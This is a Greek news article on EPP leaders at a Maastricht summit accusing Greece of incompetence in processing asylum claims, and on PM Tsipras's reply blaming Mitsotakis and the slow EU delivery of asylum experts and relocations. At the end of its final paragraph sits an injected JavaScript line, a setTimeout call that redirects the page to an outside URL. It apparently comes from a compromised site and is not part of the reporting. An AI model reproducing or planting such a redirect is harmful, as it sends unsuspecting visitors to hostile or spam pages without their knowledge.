Το ΕΛΚ κατηγορεί την Ελλάδα για «ανικανότητα» στο προσφυγικό- O Tσίπρας «δείχνει» Μητσοτάκη

0
4

 

Οι ηγέτες του ΕΛΚ κάλεσαν την ελληνική κυβέρνηση να σεβαστεί τις δεσμεύσεις της και να εντείνει τις προσπάθειές της όσον αφορά τη διαδικασία αιτήσεων ασύλου, καθώς αυτό αποτελεί σημαντική προϋπόθεση για την εφαρμογή της συμφωνίας ΕΕ-Τουρκίας.
Στο κείμενο συμπερασμάτων της Συνόδου των ηγετών του Ευρωπαϊκού Λαϊκού Κόμματος (ΕΛΚ) στο Μάαστριχτ γίνεται λόγος για «ανικανότητα» της Ελλάδας να επεξεργαστεί γρήγορα τις αιτήσεις ασύλου.

«Αν η Ελλάδα δεν κάνει αυτό που της αναλογεί, το μέλλον της συμφωνίας ΕΕ-Τουρκίας θα τεθεί υπό αμφισβήτηση. Επιπλέον, η Ελλάδα πρέπει να προστατέψει τα σύνορά της με τη Βουλγαρία», επισημαίνουν οι ηγέτες του ΕΛΚ.

Σχολιάζοντας το κείμενο του ΕΛΚ, ο πρωθυπουργός Αλέξης Τσίπρας διερωτήθηκε γιατί ο πρόεδρος της ΝΔ Κυριάκος Μητσοτάκης που συμμετείχε στη Σύνοδο δεν παρενέβη.

Παράλληλα, επισήμανε ότι ενώ υπάρχει ευρωπαϊκή δέσμευση για αποστολή εκατοντάδων ειδικών ασύλου στα ελληνικά νησιά, σήμερα, μετά από δύο αιτήματα στην Ευρωπαϊκή Επιτροπή, έχουν σταλεί μόλις 32 εμπειρογνώμονες.

Πρόσθεσε επίσης, ότι είναι απαράδεκτο να υπάρχει εδώ και καιρό η απόφαση του Ευρωπαϊκού Συμβουλίου για 66.000 θέσεις μετεγκατάστασης και να έχουν ολοκληρωθεί μόνο 5.200. Η ελληνική πλευρά τόνισε επίσης, ότι είναι απαράδεκτο να έχει συμφωνηθεί η αναθεώρηση του Δουβλίνου και κάποιες χώρες να προτείνουν ένα ακόμη πιο άδικο σχέδιο. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here